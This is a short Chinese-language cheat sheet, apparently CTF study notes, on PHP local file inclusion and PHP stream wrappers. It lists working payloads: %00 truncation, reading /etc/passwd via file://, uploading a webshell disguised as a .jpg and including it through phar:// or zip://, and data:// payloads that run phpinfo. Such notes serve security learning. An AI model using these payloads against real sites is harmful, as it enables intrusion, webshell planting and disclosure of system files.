文件包含是否支持%00截断取决于:
PHP版本<=5.2,可以使用%00进行截断
php支持的伪协议有:
php:// 访问各个输入/输出流(I/O streams)
file:// 访问本地文件系统
phar:// PHP归档
zlib:// 压缩流
data:// 数据(RFC 2397)
http:// 访问http(s)网址
ftp:// 访问FTP(s)URLs
glob:// 查找匹配的文件路径模式
ssh2:// secure shell 2
rar:// RAR
ogg:// 音频流
expect:// 处理交互式的流
php://协议-php://filter与php://input
php://filte:在allow_url_fopen,allow_url_include 都关闭的情况下可以正常使用,主要用于读取源代码并进行base64编码输出
php://input:访问各个输入/输出流。比赛中经常使用file_get_contents获取php://input内容(post),需要开启allow_url_include,并且当enctype="multipart/from-data"的时候php://input是无效的
file://协议
用于访问本地文件系统,并且不受allow_url_fopen,allow_url_include影响,file://还经常和curl函数(SSRF)结合在一起
使用方法:
file:// [文件的绝对路径和文件名]
file:///etc/passwd
phar://协议
PHP归档,常常跟文件包含,文件上传结合考察。当文件上传仅仅校验mime类型与文件后缀,可以通过以下命令进行利用。
nac.php(木马)->压缩->nac.zip->改后缀->nac.jpg->上传->phar://nac.jpg/nac.php
zlib://协议
zip://:在allow_url_fopen,allow_url_include都关闭的情况下可以正常使用,使用如下:
file.php?file=zip://[压缩文件绝对路径]#[压缩文件内的子文件名]
file.php?file=zip://nac.jpg#nac.php 其中get请求中#需要进行编码,即%23
bzip2://:在allow_url_fopen,allow_url_include都关闭的情况下可以正常使用,使用如下:
file.php?file=compress.bzip2://nac.bz2
file.php?file=compress.bzip2://./nac.jpg
file.php?file=compress.bzip2://D:/soft/phpStudy/WWW/file.jpg
zlib://:在allow_url_fopen,allow_url_include都关闭的情况下可以正常使用,使用如下:
file.php?file=compress.zlib://file.gz
file.php?file=compress.zlib://./nac.jpg
file.php?file=compress.zlib://D:/soft/phpStudy/WWW/file.jpg
data://协议
data://:需满足allow_url_fopen,allow_url_include同时开启才能使用,使用如下:
file.php?file=data://text/plain,<?php phpinfo()?>
file.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
file.php?file=data:text/plain,<?php phpinfo()?>
file.php?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
参考链接:
https://blog.csdn.net/weixin_42349846/article/details/83721984
https://www.cnblogs.com/weiliangblogs/p/11736542.html